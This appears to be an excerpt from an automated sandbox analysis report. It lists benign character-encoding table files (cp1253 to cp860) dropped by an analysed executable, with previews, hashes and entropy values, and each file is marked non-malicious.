                                                                                                                                                                                                                                            Preview:# Encoding file: cp1253, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202100882030008A2039008C008D008E008F..009020182019201C201D20222013201400982122009A203A009C009D009E009F..00A00385038600A300A400A500A600A700A800A9000000AB00AC00AD00AE2015..00B000B100B200B3038400B500B600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303B40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.307590929679485
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CWHVBUlJvRj7SOVbusZhAMiZyi77qdjrcFvGNNlkBSMH+tA/b:lMlBVnrAMiwMmdjriokgzAD
                                                                                                                                                                                                                                            MD5:5FA9162BEC5A4DEA97B5EA2840CFB065
                                                                                                                                                                                                                                            SHA1:F26858E3D2FB928F39CA87CBB8446AF099570CAD
                                                                                                                                                                                                                                            SHA-256:31639CA96A4D3602D59BD012540FE179917E0561CB11A0D0B61F1B950EB76911
                                                                                                                                                                                                                                            SHA-512:3CE7BEABBE1A0CB946149D263D3317A8B791F6D72C49DEC4621E27F50CC359D8FA3EE97C03FF05D44E47DAA59DB87F219386467614B8B3FF8CC21AB3E3BED5E6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1254, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D008E008F..009020182019201C201D20222013201402DC21220161203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.3385880810272774
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CfHVBUlJvRj7SOVbusZhAMiZyi77qdIn2hEeGlRhv6Mw6Kcv:MMlBVnrAMiwMmdInSEdhvrj7
                                                                                                                                                                                                                                            MD5:6DEA4179969D6C81C66C3B0F91B39769
                                                                                                                                                                                                                                            SHA1:7E2722576BFFABC3258C5EDB2D99FA2468D6A4B0
                                                                                                                                                                                                                                            SHA-256:47576CAE321C80E69C7F35205639680BF28010111E86E228ED191B084FAC6B91
                                                                                                                                                                                                                                            SHA-512:91CC626B6454517F06FB3616E9ED623D1A2A4BFE74AFA9885F00F6AEC835D8825A5587091B9D9AB0E5ABDA291FA3FE7CE87E2618E21EB2974D9118AE27B8A2FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1255, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A2039008C008D008E008F..009020182019201C201D20222013201402DC2122009A203A009C009D009E009F..00A000A100A200A320AA00A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE00BF..05B005B105B205B305B405B505B605B705B805B9000005BB05BC05BD05BE05BF..05C005C105C205C305F005F105F205F305F40000000000000000000000000000..05D005D105D205D305D40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.4033510023542655
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:C0HVBUlJvRj7SOVbusZhAMiZyi77q30pPE7Lym4cwGm+AMZjyG/JQIG/Y:XMlBVnrAMiwMm30FQLym4ys6Jg/Y
                                                                                                                                                                                                                                            MD5:D50DFAFEE5C605C5C00A25A9EEE4D4CF
                                                                                                                                                                                                                                            SHA1:7D51BC17931D3D809716C06E7F07C6011286A144
                                                                                                                                                                                                                                            SHA-256:29340EA8E5AD3532BF67FA77CC852F055081B1238925CB109908AA72804CCC04
                                                                                                                                                                                                                                            SHA-512:D0A9B422A1061D6239E442767069B987E33239FCBA9BACE677923888F5F8BD1DCAABC71B83A985A0A86A15DCC44316781665BBFBF24558FCB94FDA6783285BCB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1256, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC067E201A0192201E20262020202102C62030067920390152068606980688..06AF20182019201C201D20222013201406A921220691203A0153200C200D06BA..00A0060C00A200A300A400A500A600A700A800A906BE00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B9061B00BB00BC00BD00BE061F..06C1062106220623062406250626062706280629062A062B062C062D062E062F..063006310632063306340635063600D7063706380639063A0640064106420643..00E0064400E2064506460
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.344584404753015
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CNHVBUlJvRj7SOVbusZhAMiZyi77q8uWTfNL4wIBUioGndt:uMlBVnrAMiwMm8uWJDNIt
                                                                                                                                                                                                                                            MD5:CC3D24543FDD4644BBBD4AAB30CA71BC
                                                                                                                                                                                                                                            SHA1:8E2658E7F782F005411BCB8423BDFC3C68BDED14
                                                                                                                                                                                                                                            SHA-256:C15AB85438728BF2C60D72B1A66AF80E8B1CE3CF5EB08BA6421FF1B2F73ACDF4
                                                                                                                                                                                                                                            SHA-512:5ECABF820098F7D24AB806ADD9CA3E1087C29914FB2DE6BA3DC656234202DE3FDF80A7E9ED433CCB2149FF07184F74884CEB37A1B689E9E0C1402916F3E13AFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1257, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E20262020202100882030008A2039008C00A802C700B8..009020182019201C201D20222013201400982122009A203A009C00AF02DB009F..00A0000000A200A300A4000000A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B300B400B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F0101010700E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.2984943182702593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CKlHVBUlJvRj7SOVbusZhAMiZyi77qdIQ2jFvGNNykoxWi3/i:xMlBVnrAMiwMmdIQufkoxn3q
                                                                                                                                                                                                                                            MD5:12BCEAE6B6A5FAE5AE9C42F5998BA485
                                                                                                                                                                                                                                            SHA1:C9620DA0C763D2C3770386E69EE7E421BD1BA965
                                                                                                                                                                                                                                            SHA-256:29D93DEE7C01B2264778BC6B75F6EF76EA6AC53E9F4A334D83707229E7F482D2
                                                                                                                                                                                                                                            SHA-512:714BAF58462FB0E84A32D82C8FC2D63EDF78DF8CCE578391E2521737F94F860B5CCFE41B481E1D09879A6811FCFD8B98A2724DB1D15749BD5293A9B33BCAD071
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1258, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A20390152008D008E008F..009020182019201C201D20222013201402DC2122009A203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C2010200C400C500C600C700C800C900CA00CB030000CD00CE00CF..011000D1030900D300D401A000D600D700D800D900DA00DB00DC01AF030300DF..00E000E100E2010300E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.515546664597914
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CFyHVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBIqE18wDyV8mK:wyMlBVnrAMiwMm+VhE1LmK
                                                                                                                                                                                                                                            MD5:CE6D8A6542DC12D1783084FA4B2B63EA
                                                                                                                                                                                                                                            SHA1:5039A350C8E3E2C6F353B438B41BD0B6A7AB8069
                                                                                                                                                                                                                                            SHA-256:E5613C04D3D2EE44CCAD85AE53A37C257674491C540836E5D942BBCC4E4A8DB4
                                                                                                                                                                                                                                            SHA-512:E8C5CFB747486BBE0E567B6E87B59D5246D749A80C8F64F6669227C7FD849886F98A1F94451922AC099409AC14890F1A8B1E5F25EA584FDB1522ACE3AD0BE6A6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp437, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00A200A300A520A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.6177058818384693
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CjHVBUlJvRj7SOVbusZhAMiZyi77qSKOQFhWehDrq18wDyVKockoiH:WMlBVnrAMiwMmSKOQFhWeh3q1odH
                                                                                                                                                                                                                                            MD5:8EF3CBCA101F5777846D12D3C96A0A7D
                                                                                                                                                                                                                                            SHA1:5EC5418B861894E0F18EA15AA4414019815E2EA2
                                                                                                                                                                                                                                            SHA-256:A0415F14F5D72AD24E9C3A5C91517A0E3D22E1ADBC3505C0C6E918B961F7A07D
                                                                                                                                                                                                                                            SHA-512:FB14C88E61E5459B4A8706751D88D0A261AC6B4171F72912D87CE78A2BC97A821CCF5B53676FB229C08F9E557BE624F4DC649B722A906B9B7944ED2D5E7F9065
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp737, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..039103920393039403950396039703980399039A039B039C039D039E039F03A0..03A103A303A403A503A603A703A803A903B103B203B303B403B503B603B703B8..03B903BA03BB03BC03BD03BE03BF03C003C103C303C203C403C503C603C703C8..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03C903AC03AD03AE03CA03
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.451057608106102
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CsOHVBUlJvRj7SOVbusZhAMiZyi77qoo9ecL067J4ZNUPVw3PfA:AMlBVnrAMiwMm59T067KDLPo
                                                                                                                                                                                                                                            MD5:9656761FA02EA24773EAD3E5C4BDB975
                                                                                                                                                                                                                                            SHA1:366228F25392708FA799E9CC0830CE9917EF6CA7
                                                                                                                                                                                                                                            SHA-256:C3C6542E902DEC2C44DDCFD8B5CB7ABF309B0413A7CED1614DC0B20CF7C5E35F
                                                                                                                                                                                                                                            SHA-512:A6A44B9A2193D75764DC284BE53264E57BFEB2A221FD54B4577DD90752F69A45E6B9D293108A7AB895F347A24FD10AAE84954A043AB1F466F485D707D7412380
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp775, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..010600FC00E9010100E4012300E501070142011301560157012B017900C400C5..00C900E600C6014D00F6012200A2015A015B00D600DC00F800A300D800D700A4..0100012A00F3017B017C017A201D00A600A900AE00AC00BD00BC014100AB00BB..259125922593250225240104010C01180116256325512557255D012E01602510..25142534252C251C2500253C0172016A255A25542569256625602550256C017D..0105010D01190117012F01610173016B017E2518250C25882584258C25902580..00D300DF014C014300F500
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.3718781469586827
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:C9HVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBc+myS5LeQDTVwA:EMlBVnrAMiwMm+VeyS5SQn/
                                                                                                                                                                                                                                            MD5:2169EE726DCC011E6C3505D586C88FC3
                                                                                                                                                                                                                                            SHA1:094252AD0634787E2D7F0D28A448437054D359C7
                                                                                                                                                                                                                                            SHA-256:13DF611F429A9B331DA1B34F3C718CCCAF0BD4AB44F71A9C632197987B4D643B
                                                                                                                                                                                                                                            SHA-512:BC5831EF1C131095A22C76FFCB5C4217081AF796B60455BE2DE2E2689CFE1033F07E8B45449F77E7804A7D52CBCFB916B0B4639828E65B14475BB3367F47C8EE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp850, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00F800A300D800D70192..00E100ED00F300FA00F100D100AA00BA00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00F000D000CA00CB00C8013100CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.4509005787389877
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CPHVBUlJvRj7SOVbusZhAMiZyi77q7EUsOtycwQIc+922V:mMlBVnrAMiwMmwvOtycwQIc+9R
                                                                                                                                                                                                                                            MD5:48402B424B5101BDEEB0192BBA96DB7D
                                                                                                                                                                                                                                            SHA1:C9EB93A37AF70F4134AA9CF05D914A30FB3201DD
                                                                                                                                                                                                                                            SHA-256:F3A18A8C7934F6586F023477E08D3F9D5EAD9A45E9E58A3F8D018AF9BB13F868
                                                                                                                                                                                                                                            SHA-512:4EE615605BFF3D94A7FC4FE23D8288F0F20F6792C8C69ECACABAE82F1A334D8417C5DFFC0DA3702E2DB09B7BE1E5FF19C6A0F460C9A5EC84D1856BB9C8061CA5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp852, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E4016F010700E7014200EB0150015100EE017900C40106..00C90139013A00F400F6013D013E015A015B00D600DC01640165014100D7010D..00E100ED00F300FA01040105017D017E0118011900AC017A010C015F00AB00BB..2591259225932502252400C100C2011A015E256325512557255D017B017C2510..25142534252C251C2500253C01020103255A25542569256625602550256C00A4..01110110010E00CB010F014700CD00CE011B2518250C258825840162016E2580..00D300DF00D40143014401
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.4277025591531864
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CoHVBUlJvRj7SOVbusZhAMiZyi77qLHVWjwk/rMZC032SLnD2JbD:hMlBVnrAMiwMmx8whM03VLDy
                                                                                                                                                                                                                                            MD5:8B8AA56F83BA750EB73FAE542E76FF1A
                                                                                                                                                                                                                                            SHA1:2F3C3BA4B854A7D6B0A3D27BC519EE66A042E05A
                                                                                                                                                                                                                                            SHA-256:E64FD2E639DA6F654D9BFBB2266F9432259A6A55941622F5CDDC3797E382EB0A
                                                                                                                                                                                                                                            SHA-512:8B4061176663F7AC01B3969D25F680B5870A8EAD864CFAD897F18E75409CE721E6CC367A88EBABAF72E77D4542EE1894F2A6EE47A43FB3D4C650CFA18DFD3D71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp855, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0452040204530403045104010454040404550405045604060457040704580408..04590409045A040A045B040B045C040C045E040E045F040F044E042E044A042A..0430041004310411044604260434041404350415044404240433041300AB00BB..259125922593250225240445042504380418256325512557255D043904192510..25142534252C251C2500253C043A041A255A25542569256625602550256C00A4..043B041B043C041C043D041D043E041E043F2518250C25882584041F044F2580..042F044004200441042104
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.364496856690505
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CaHVBUlJvRj7SOVbusZhAMiZyi77qZpu6uUV5Dw5LeBCVHjzA:jMlBVnrAMiwMmyUVFw5SYdI
                                                                                                                                                                                                                                            MD5:BA52A031DE1B1A6ED1C41BED8946750C
                                                                                                                                                                                                                                            SHA1:BD54C0E2F62FD36675892A61FD8B340A56845D20
                                                                                                                                                                                                                                            SHA-256:B6CD5C6F2B54D89142679D599ED0A5DEE6955A3B3F6B6673E46AFE7A5A303CDC
                                                                                                                                                                                                                                            SHA-512:5F915AABE39F31CE9337B4B9B0239DF8ADA898D2D9F111DD09D97689DB89CF45B093AC187FC28484CFB213D14B0D8F58C5668D0A59726282D6F52D5D24697816
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp857, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE013100C400C5..00C900E600C600F400F600F200FB00F9013000D600DC00F800A300D8015E015F..00E100ED00F300FA00F100D1011E011F00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00BA00AA00CA00CB00C8000000CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.506813480871637
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CMHVBUlJvRj7SOVbusZhAMiZyi77qij4Axlt49Y18wDyV8mK:VMlBVnrAMiwMm/g+9Y1LmK
                                                                                                                                                                                                                                            MD5:C416471B57FB894DC45D30C31B4BD2E2
                                                                                                                                                                                                                                            SHA1:BA378F8122280992AE51245A06814D8155564220
                                                                                                                                                                                                                                            SHA-256:804EFA345C5BBBAD2449C318A7A3F5B31F4234712AAD23DC49B3FB5AA33B7A57
                                                                                                                                                                                                                                            SHA-512:E7CDE706CFE573525C2DE319AD5783AE9D97C4F6D28B14A77A729F281540B0DAFAD4C14879EF76473BFDEBC38499C65CA228470983F2D1BC31938A91A2486522
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp860, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E300E000C100E700EA00CA00E800CD00D400EC00C300C2..00C900C000C800F400F500F200DA00F900CC00D500DC00A200A300D920A700D3..00E100ED00F300FA00F100D100AA00BA00BF00D200AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5174672833207183
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:ClHVBUlJvRj7SOVbusZhAMiZyi77qZpORVPnA2Gm18wDyV8mK:8MlBVnrAMiwMmiVPAA1LmK
                                                                                                                                                                                                                                            MD5:4997979FD1692063E2B9AA9870E0BE4C
                                                                                                                                                                                                                                            SHA1:919012354B99BBEF4C85517E89A2C9CD340FCE49
                                                                                                                                                                                                                                            SHA-256:4B7E76AEB75289FACA76434EA6E9874E9504AD2BC3D8D47550EADBCC8294857E
                                                                                                                                                                                                                                            SHA-512:C122A1AE2DE79CB97E5989535B7478A76D905CDE60B01F80F5B84EDB9DF08BE6829E1811AF19608971DA048B8DA24F40DE0217A8054AC612EC2D8B3560500FBE
                                                                                                                                                                                                                                            Malicious:false
